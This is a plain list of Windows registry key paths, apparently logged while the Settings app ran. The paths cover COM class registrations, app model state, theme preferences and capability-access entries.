HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{f7a88ec3-6f33-46bf-83b8-78aaf94ac396}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{f7a88ec3-6f33-46bf-83b8-78aaf94ac396}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{f7a88ec3-6f33-46bf-83b8-78aaf94ac396}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\WRT:windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel+1+00000000000201CE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\WRT:windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel+1+00000000000201CE\ShowInSwitchers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\ActivateOnHostFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\WRT:windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel+1+00000000000201CE\VirtualDesktop
HKEY_CURRENT_USER\Software\Classes\Interface\{F3E74273-0BE4-580A-A90B-D7880A95B914}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{f3e74273-0be4-580a-a90b-d7880a95b914}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{f3e74273-0be4-580a-a90b-d7880a95b914}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Metadata
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Index\PackageFullName\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\User\Index\UserSid\S-1-5-21-932793227-1321892499-785312009-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\PackageExternalLocation\Index\UserAndPackage\3^10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\PackageExternalLocation\Index\UserAndPackage\0^10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\InstalledLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\MutableLink
HKEY_LOCAL_MACHINE\Software\Microsoft\SecurityManager\CapAuthz
HKEY_LOCAL_MACHINE\Software\Microsoft\SecurityManager\CapAuthz\HasRepaired
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange\PackageList\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Repository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz
HKEY_CURRENT_USER\Software\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Microsoft\SecurityManager\CapDBRedirect
HKEY_CURRENT_USER\Software\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\AppPackageType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\PackageSid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\CapSids
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ApplicationFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\PackageOrigin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\Flags
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows.immersivecontrolpanel_cw5n1h2txyewy\ResourcesConfig
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Mrt\_Merged
HKEY_LOCAL_MACHINE\Software\Microsoft\LanguageOverlay\OverlayPackages
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\SecurityManager\AdminCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\packageQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateOnHostFlags
HKEY_CLASSES_ROOT\CLSID\{4234D49B-0245-4DF3-B780-3893943456E1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4234d49b-0245-4df3-b780-3893943456e1}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4234D49B-0245-4DF3-B780-3893943456E1}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4234D49B-0245-4DF3-B780-3893943456E1}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\ColorPrevalence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\SystemUsesLightTheme
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\EnableTransparency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Feeds
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\IsFeedsAvailable
HKEY_CURRENT_USER\Software\Classes\Interface\{24677459-C19E-43F9-8EA8-984D017ABAFA}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\NowPlayingSessionManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NowPlayingSessionManager\LocalProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}\Generation
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A52BBA46-E9E1-435F-B3D9-28DAA648C0F6}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}\
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ThumbnailCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D0D73345-806E-4526-8AD6-3B3BB2EC2895}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{D0D73345-806E-4526-8AD6-3B3BB2EC2895}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D0D73345-806E-4526-8AD6-3B3BB2EC2895}\ProxyStubClsid32\(Default)
HKEY_USERS\S-1-5-21-932793227-1321892499-785312009-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel\PreferredMinSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Scaling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\ActivePolicyCode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess\ActivePolicyCode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\accessoryManager\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\accessoryManager\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\activity
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\activity\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\activity\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\activity\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appDiagnostics
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appDiagnostics\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appDiagnostics\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appDiagnostics\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointments\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointments\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointments\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointmentsSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointmentsSystem\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointmentsSystem\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointmentsSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\backgroundSpatialPerception
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\backgroundSpatialPerception\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\backgroundSpatialPerception\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\backgroundSpatialPerception\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.genericAttributeProfile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.genericAttributeProfile\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.genericAttributeProfile\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.genericAttributeProfile\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.rfcomm
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.rfcomm\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.rfcomm\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.rfcomm\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothAdapter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothAdapter\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothAdapter\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothAdapter\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothSync
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothSync\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothSync\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothSync\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\broadFilesystemAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\broadFilesystemAccess\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\broadFilesystemAccess\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularData\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularData\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularDeviceControl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularDeviceControl\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularDeviceControl\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularDeviceControl\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chat\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chat\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chat\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chatSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chatSystem\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chatSystem\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chatSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\comPort
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\comPort\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\comPort\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\comPort\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contacts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contacts\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contacts\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contacts\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contactsSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contactsSystem\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contactsSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\documentsLibrary
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\documentsLibrary\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\documentsLibrary\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\documentsLibrary\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\email
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\email\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\email\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\email\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\emailSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\emailSystem\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\emailSystem\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\emailSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\gazeInput
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\gazeInput\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\gazeInput\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\gazeInput\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\graphicsCaptureWithoutBorder\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\humanInterfaceDevice
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\humanInterfaceDevice\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\humanInterfaceDevice\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\humanInterfaceDevice\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClient
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClient\Edition
